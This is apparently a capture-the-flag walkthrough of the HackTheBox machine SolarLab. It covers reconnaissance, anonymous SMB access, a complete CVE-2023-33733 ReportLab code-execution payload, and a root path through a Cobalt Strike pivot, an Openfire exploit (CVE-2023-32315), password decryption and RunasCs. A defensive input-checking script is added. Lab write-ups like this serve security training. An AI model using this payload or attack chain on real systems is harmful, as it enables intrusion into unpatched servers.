In this walkthrough, I demonstrate how I obtained complete ownership of SolarLab on HackTheBox.
Let's Solve SolarLab: HTB Writeup
SolarLab is a notable challenge within the HacktheBox community, demanding a comprehensive understanding of cybersecurity and penetration testing. By immersing ourselves in this hands-on experience, we gain invaluable insights into the real-world scenarios faced by ethical hackers in securing digital environments.
HTB SolarLab link: https://app.hackthebox.com/machines/SolarLab
Reconnaissance
Scan ports:
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://solarlab.htb/>
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to <http://report.solarlab.htb:6791/>
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -21s
| smb2-time:
| date: 2024-05-13T16:13:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Add the domains to /etc/hosts
echo "10.10.11.16 solarlab.htb" | sudo tee -a /etc/hosts
echo "10.10.11.16 report.solarlab.htb" | sudo tee -a /etc/hosts
We open the site:
User flag
We connect to SMB anonymously.
We download the spreadsheet containing passwords.
We log in as the blakeb user and land here:
We stumble upon a PDF generator. Looking at the metadata of a generated file, we see that the document is produced with the ReportLab PDF Library.
Searching for known vulnerabilities in this library, we come across CVE-2023-33733. This is a vulnerability in ReportLab caused by unsafe processing of input data (expressions inside paragraph markup are evaluated), which allows an attacker to execute arbitrary code on the server that renders the PDF.
Read more here: https://github.com/c53elyas/CVE-2023-33733
PoC:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('Здесь мог бы быть ваш payload') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
Intercept the request in Burp Suite and insert the payload.
We get a shell and read the user flag.
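As an added defender-side example (not code from the original post or from ReportLab), here is an input screen for the paragraph markup that a PDF generator like this one hands to ReportLab: it allow-lists tags and attributes and rejects any color value that is not a plain colour name or a #RRGGBB literal, which is exactly the attribute the CVE-2023-33733 payload above abuses. The tag and attribute allow-lists and the sample strings are assumptions for illustration; upgrading ReportLab to a patched release remains the primary fix.

```python
import re
from html.parser import HTMLParser

# Allow-list for colour values: a named colour or a #RRGGBB literal.
# Anything else (brackets, quotes, expressions) is rejected outright.
SAFE_COLOR = re.compile(r"^(#[0-9a-fA-F]{6}|[A-Za-z]{1,20})$")
SAFE_SIZE = re.compile(r"^\d{1,2}$")
# Tags and per-tag attributes a report template legitimately needs (assumed).
ALLOWED_TAGS = {"para", "font", "b", "i", "u", "br"}
ALLOWED_ATTRS = {"font": {"color", "size", "name"}}


class _MarkupChecker(HTMLParser):
    """Walks the markup and records every construct outside the allow-list."""

    def __init__(self):
        super().__init__()
        self.problems = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.problems.append(f"tag <{tag}> not allowed")
            return
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.problems.append(f"attribute {name!r} not allowed on <{tag}>")
            elif name == "color" and not SAFE_COLOR.match(value):
                self.problems.append(f"unsafe color value: {value[:40]!r}")
            elif name == "size" and not SAFE_SIZE.match(value):
                self.problems.append(f"unsafe size value: {value[:40]!r}")

    # Self-closing tags such as <br/> arrive here; treat them like start tags.
    handle_startendtag = handle_starttag


def check_markup(markup: str) -> list:
    """Return the list of problems; an empty list means the markup may be
    passed on to ReportLab's Paragraph()."""
    checker = _MarkupChecker()
    checker.feed(markup)
    checker.close()
    return checker.problems


# Constructed samples (not from the original post): a benign paragraph and one
# whose color attribute carries an expression instead of a colour name.
BENIGN = '<para><font color="red" size="12">Quarterly report</font></para>'
SUSPICIOUS = '<para><font color="[[[1 for x in [1]]] and \'red\'">x</font></para>'

if __name__ == "__main__":
    print(check_markup(BENIGN))      # []
    print(check_markup(SUSPICIOUS))  # one 'unsafe color value' finding
```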
Root flag
View open ports
We launch Cobalt Strike and start a SOCKS4 proxy on port 57378. As an alternative to Cobalt Strike, Chisel can be used for the port forwarding: https://github.com/Pokefenn/Chisel
Using proxychains, we check the connection.
Through FoxyProxy we reach the local web service on port 9090.
We are met by the Openfire login form.
We start msfconsole, routing all traffic through the compromised machine.
We use the exploit for CVE-2023-32315. It creates a new account for us and returns a shell.
Go to the database file directory
Find the Openfire database
We pull out the administrator hash
We decrypt it with OpenFireDecryptPass.
We upload RunasCs.exe to the target machine. It allows creating a process as the administrator (if the password is known) with full privileges.
Having previously uploaded Shell.exe to the user's desktop, we run the exe and catch the session in Cobalt Strike.
We read the root flag.
FAQ
What is the SolarLab challenge on HacktheBox?
The SolarLab challenge on HacktheBox is a simulated cybersecurity challenge that tests participants’ hacking skills and knowledge. It presents a realistic scenario in which players must navigate through a virtual environment, identifying vulnerabilities, exploiting them, and escalating privileges to complete the challenge objectives.
What skills are required to tackle the SolarLab challenge?
Tackling the SolarLab challenge requires proficiency in various areas, including network reconnaissance, vulnerability scanning, exploit development, privilege escalation, and post-exploitation techniques. Participants must have a solid understanding of penetration testing methodologies, common hacking tools, and techniques to successfully navigate the challenge.
What is the initial reconnaissance phase in the SolarLab challenge?
The initial reconnaissance phase in the SolarLab challenge involves gathering information about the target network and infrastructure. Hackers leverage various methods and tools like port scanning, banner grabbing, and enumeration to identify potential entry points and understand the layout and technologies used in the SolarLab environment.
How is scanning and enumeration performed in the SolarLab challenge?
Scanning and enumeration in the SolarLab challenge involve using tools such as Nmap and enumeration scripts to identify open ports, services, and potential vulnerabilities. This phase helps hackers gather valuable information about the target system, including running services, software versions, and misconfigurations that may lead to exploitable vulnerabilities.
What is the process of exploiting vulnerabilities in the SolarLab challenge?
Exploiting vulnerabilities in the SolarLab challenge involves identifying and leveraging weaknesses within the target system or applications. Hackers may utilize exploit frameworks, custom scripts, or manual exploitation techniques to exploit vulnerabilities, gain unauthorized access, and achieve the desired objectives of the challenge.
How do you escalate privileges in the SolarLab challenge?
Privilege escalation in the SolarLab challenge involves elevating user privileges to gain access to restricted files, directories, or systems. Hackers make use of various techniques like exploiting misconfigurations, leveraging kernel vulnerabilities, and abusing weak access controls to escalate privileges within the target environment.
What is the post-exploitation phase in the SolarLab challenge?
The post-exploitation phase in the SolarLab challenge focuses on maintaining access, exfiltrating data, and exploring the compromised system. Hackers may set up backdoors, establish persistence mechanisms, perform lateral movement to other systems, or extract sensitive information to achieve the intended goals of the challenge.
How important is analysis and reporting in the SolarLab challenge?
Analysis and reporting play a crucial role in the SolarLab challenge as they enable hackers to document their findings, actions, and techniques used throughout the challenge. Proper analysis helps identify areas of improvement, while comprehensive reporting showcases the skills and knowledge gained during the hands-on experience, enhancing the ethical hacking and penetration testing capabilities of participants.
What can be learned from completing the SolarLab challenge?
Completing the SolarLab challenge provides valuable hands-on experience in various aspects of ethical hacking and penetration testing. Participants gain insights into real-world hacking scenarios, improve their technical skills, enhance their problem-solving abilities, and develop a deep understanding of secure system configurations and vulnerabilities that can be used to improve cybersecurity practices.